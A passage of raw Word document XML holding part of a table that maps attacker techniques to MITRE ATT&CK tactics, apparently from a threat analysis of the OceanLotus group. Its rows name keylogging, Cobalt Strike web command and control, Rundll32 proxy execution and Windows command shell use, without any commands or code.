            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0AD2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09B541E1" w14:textId="49BBFD77" w:rsidR="007B4DCC" w:rsidRPr="00B857D7" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0AD2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1056.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0AD2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Input Capture&gt;:Keylogging</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09AD0F90" w14:textId="5768EA7D" w:rsidR="007B4DCC" w:rsidRDefault="003F4B3E" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00954527">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="630" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EEE014E" w14:textId="77777777" w:rsidR="007B4DCC" w:rsidRPr="00B857D7" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="458F7C4D" w14:textId="1CC8180B" w:rsidR="007B4DCC" w:rsidRPr="00B857D7" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F3AAAFA" w14:textId="340507B1" w:rsidR="007B4DCC" w:rsidRPr="00B857D7" w:rsidRDefault="007A07D3" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r w:rsidR="00F55E8B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>-COL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18BE2458" w14:textId="77777777" w:rsidR="007B4DCC" w:rsidRPr="00B857D7" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B4DCC" w:rsidRPr="00B857D7" w14:paraId="2FEF1A04" w14:textId="77777777" w:rsidTr="007B4DCC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07A505FD" w14:textId="53806394" w:rsidR="007B4DCC" w:rsidRDefault="006E46DD" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="005D0E9A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60E38084" w14:textId="77777777" w:rsidR="007B4DCC" w:rsidRPr="00B857D7" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DB171B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00DB171B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00DB171B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Command &amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12C63E58" w14:textId="77777777" w:rsidR="007B4DCC" w:rsidRPr="00B857D7" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00A1257B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1071.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00A1257B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Application Layer Protocol&gt;:Web Protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A526925" w14:textId="50D80F0B" w:rsidR="007B4DCC" w:rsidRDefault="003F4B3E" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00954527">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="630" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53521B3D" w14:textId="77777777" w:rsidR="007B4DCC" w:rsidRPr="00B857D7" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E0C4B03" w14:textId="29F77569" w:rsidR="007B4DCC" w:rsidRPr="00B857D7" w:rsidRDefault="000A3FFE" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26988C9B" w14:textId="4F4ED3B0" w:rsidR="007B4DCC" w:rsidRPr="00B857D7" w:rsidRDefault="006174D9" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4556D9D2" w14:textId="77777777" w:rsidR="007B4DCC" w:rsidRPr="00B857D7" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Cobalt Strike Fileless Infrastructure (HTTP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002A1E3D" w:rsidRPr="002A1E3D" w14:paraId="0C310188" w14:textId="77777777" w:rsidTr="007B4DCC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="103082C5" w14:textId="57B0CF52" w:rsidR="007B4DCC" w:rsidRPr="002A1E3D" w:rsidRDefault="002A1E3D" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002A1E3D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3015712C" w14:textId="236DA4B2" w:rsidR="007B4DCC" w:rsidRPr="002A1E3D" w:rsidRDefault="002A1E3D" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002A1E3D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="002A1E3D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="002A1E3D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="002A1E3D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="002A1E3D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41A361E7" w14:textId="350E68FD" w:rsidR="007B4DCC" w:rsidRPr="002A1E3D" w:rsidRDefault="002A1E3D" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="002A1E3D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1218.011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="002A1E3D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;System Binary Proxy Execution&gt;:Rundll32</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33EFA83F" w14:textId="71E082B1" w:rsidR="007B4DCC" w:rsidRPr="002A1E3D" w:rsidRDefault="002A1E3D" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002A1E3D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="630" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F980C02" w14:textId="77777777" w:rsidR="007B4DCC" w:rsidRPr="002A1E3D" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5636CC8A" w14:textId="4D02C0CD" w:rsidR="007B4DCC" w:rsidRPr="002A1E3D" w:rsidRDefault="002A1E3D" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002A1E3D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C163DC0" w14:textId="557CED26" w:rsidR="007B4DCC" w:rsidRPr="002A1E3D" w:rsidRDefault="006174D9" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEV/NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="741EF9C8" w14:textId="77777777" w:rsidR="007B4DCC" w:rsidRDefault="002A1E3D" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002A1E3D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Added as an example. It is not entirely clear when it is used but notes that it is used to download additional payloads </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="002A1E3D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>e.g.</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="002A1E3D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> COM </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="002A1E3D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>scriptlets</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="1E64E1DE" w14:textId="77777777" w:rsidR="002A1E3D" w:rsidRDefault="002A1E3D" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4C4B9F74" w14:textId="5965E6C8" w:rsidR="002A1E3D" w:rsidRPr="002A1E3D" w:rsidRDefault="002A1E3D" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[3] </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">The attackers downloaded COM </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>scriptlets</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> using regsvr32.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B4DCC" w:rsidRPr="00B857D7" w14:paraId="536DC065" w14:textId="77777777" w:rsidTr="007B4DCC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55621D04" w14:textId="2F6440DD" w:rsidR="007B4DCC" w:rsidRDefault="00341143" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FFFF852" w14:textId="45828132" w:rsidR="007B4DCC" w:rsidRPr="00B857D7" w:rsidRDefault="00341143" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003470D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003470D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="003470D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E56055F" w14:textId="77777777" w:rsidR="002A1E3D" w:rsidRPr="002A1E3D" w:rsidRDefault="002A1E3D" w:rsidP="002A1E3D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="002A1E3D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1059.003 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="002A1E3D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:Windows Command Shell</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09E641C7" w14:textId="77777777" w:rsidR="007B4DCC" w:rsidRPr="00B857D7" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6176168E" w14:textId="48BA6D5C" w:rsidR="007B4DCC" w:rsidRDefault="002A1E3D" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="630" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35325490" w14:textId="77777777" w:rsidR="007B4DCC" w:rsidRPr="00B857D7" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="333606DB" w14:textId="33024867" w:rsidR="007B4DCC" w:rsidRPr="00B857D7" w:rsidRDefault="002A1E3D" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A4C2652" w14:textId="021F2B8B" w:rsidR="007B4DCC" w:rsidRPr="00B857D7" w:rsidRDefault="006174D9" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2666DE60" w14:textId="754CFDE9" w:rsidR="007B4DCC" w:rsidRPr="00B857D7" w:rsidRDefault="002A1E3D" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002A1E3D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>See above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5043C4F3" w14:textId="77777777" w:rsidR="0059419E" w:rsidRPr="0077286F" w:rsidRDefault="0059419E" w:rsidP="0059419E"/>
    <w:p w14:paraId="52E78707" w14:textId="77777777" w:rsidR="0059419E" w:rsidRPr="00C94979" w:rsidRDefault="0059419E" w:rsidP="0059419E"/>
    <w:p w14:paraId="1733EED6" w14:textId="77777777" w:rsidR="0059419E" w:rsidRDefault="0059419E" w:rsidP="0059419E">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5D071B61" w14:textId="77777777" w:rsidR="006819C1" w:rsidRDefault="006819C1" w:rsidP="0059419E">
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:hyperlink r:id="rId90" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>OceanLotus</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
